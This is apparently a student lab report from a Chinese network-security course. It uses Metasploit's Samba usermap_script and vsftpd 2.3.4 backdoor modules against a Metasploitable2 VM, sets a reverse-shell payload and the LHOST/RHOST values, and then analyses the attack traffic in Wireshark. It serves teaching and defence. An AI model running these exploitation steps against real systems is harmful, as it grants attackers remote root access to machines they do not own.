20222937 2022-2023-4 《网络攻防实践》第七周作业

20222937 2022-2023-4 《网络攻防实践》第七周作业

实践七 Linux操作系统攻防

1.实践内容

实践任务

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

④设置渗透攻击参数(RHOST,LHOST,TARGET等);

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

linux操作系统安全机制

Linux身份认证机制:Linux用户、linux用户组、Linux的本地登陆用户认证机制、Linux的远程登陆用户认证机制、Linux的统一身份认证中间件-PAM。
Linux授权与访问控制机制:文件所有者、文件的访问权限、文件的特殊执行权限、Linux访问机制的不足及改进。
Linux安全审计机制:连接时间日志、进程控制日志、错误日志记录。

linux系统远程攻防技术

主要方法
对Linux系统各种网络服务的身份认证过程所涉及的用户口令字进行猜测攻击
发掘Linux系统某个监听网络服务的安全漏洞并进行利用,从而为攻击者提供本地Shell的访问权
通过网页木马、发送欺诈邮件、提供特洛伊木马程序等技术和社会工程学手段
在Linux系统作为连接多个网络的路由器,或者打开“混杂模式”实施网络嗅探的监听器时,可能遭受攻击者特意构造的数据包攻击,从而被攻击者取得访问权。
防范措施
禁用所有不必要的网络服务
尽量选择更安全的网络协议与服务软件,并使用最佳安全实践进行部署
及时更新网络服务版本
使用xinetd、防火墙为Linux网络服务添加网络访问控制机制
建立入侵检测与应急响应计划流程

linux系统本地攻防技术

Linux本地特权提升
破解出Root用户的口令,然后执行su或sudo命令进行提升
发掘并利用su或sudo程序中的漏洞
攻击用户态SUID特权提升漏洞
攻击Linux内核代码特权提升漏洞
从系统中搜索全局可写的敏感文件与目录位置并加以利用

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

主机IP地址
Kali192.168.200.4
Metasploitable2-Linux192.168.200.123

1.测试连通性:
在Kali虚拟机上ping Metasploitable2-Linux虚拟机的IP地址192.168.200.123,测试其连通性:
如图所示,虚拟机间正常联通。
在这里插入图片描述
在Metasploitable2-Linux虚拟机上ping Kali虚拟机的IP地址192.168.200.4,测试其连通性:
如图所示,虚拟机间正常联通。
在这里插入图片描述
2.在Kali虚拟机中输入指令:nmap -T4 192.168.200.123:
查看Metasploitable2-Linux使用的端口;
由图可知Metasploitable2-Linux开放tcp端口有:21、22、23、25、53、80、111、139、445、512、513、514、1099端口等。
在这里插入图片描述
3.在kali虚拟机中使用指令msfconsole打开渗透软件metasploit:
在这里插入图片描述
4.输入指令:use exploit/multi/samba/usermap_script,查看攻击载荷并设置攻击载荷:
在这里插入图片描述
输入指令:show payloads显示有效的攻击载荷:
在这里插入图片描述
5.输入指令set payload cmd/unix/reverse 选择攻击PAYLOAD,反向连接:
在这里插入图片描述
在Kali虚拟机中输入指令 set LHOST 192.168.200.4,进行攻击机IP地址设置:
在这里插入图片描述
在Kali虚拟机中输入指令 set RHOST 192.168.200.123 进行靶机IP地址设置:
在这里插入图片描述
在上述设置完成后,输入指令:exploit 进行攻击:
在这里插入图片描述
6.输入shell命令
在这里插入图片描述
通过 whoami 查询,发现我们已经获得了root权限,这表明提权成功。
在这里插入图片描述

2.2 攻防对抗实践

主机IP地址
攻击方192.168.200.4
防守方192.168.200.123

在Kali Linux攻击机中打开msfconsole
在这里插入图片描述
运行命令search vsftpd,搜索可用漏洞。
在这里插入图片描述
输入use exploit/unix/ftp/vsftpd_234_backdoor,选择这个漏洞
在这里插入图片描述
通过运行显示载荷命令show payloads可以发现,这个漏洞只有这一个载荷。
在这里插入图片描述
输入指令 set payload cmd/unix/interact 手动选择
输入指令 set LHOST 192.168.200.4,进行攻击机IP地址设置:
输入指令 set RHOST 192.168.200.123 进行靶机IP地址设置:
在这里插入图片描述
打开Wireshark,开始抓包监听。
在攻击机上输入run,开始攻击。
在这里插入图片描述
1.使用Wireshark进行抓包分析,可以得到攻击者的IP地址为192.168.200.4,目标IP为192.168.200.123,目标端口为6200。
在这里插入图片描述
2.可以查看到TCP建立连接时间:
在这里插入图片描述
3.追踪TCP包的TCP数据流
在这里插入图片描述
对攻击过程进行分析:
首先,靶机在收到攻击机的请求后,靶机的TCP协议向攻击机返回了vsFTPD的版本号2.3.4
然后,攻击机向靶机发送请求:用户是0YAy:)
之后,靶机要求攻击机提供该账户的密码,攻击机向靶机提供了密码g

3.学习中遇到的问题及解决

本次实验未遇到问题

4.实践总结

本次实验过程与上一次类似,所有没有遇到困难。通过本实验可以充分看出Linux系统中某些严重的漏洞的危险性,我们应该认识到及早发现、尽早修复漏洞的重要性。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值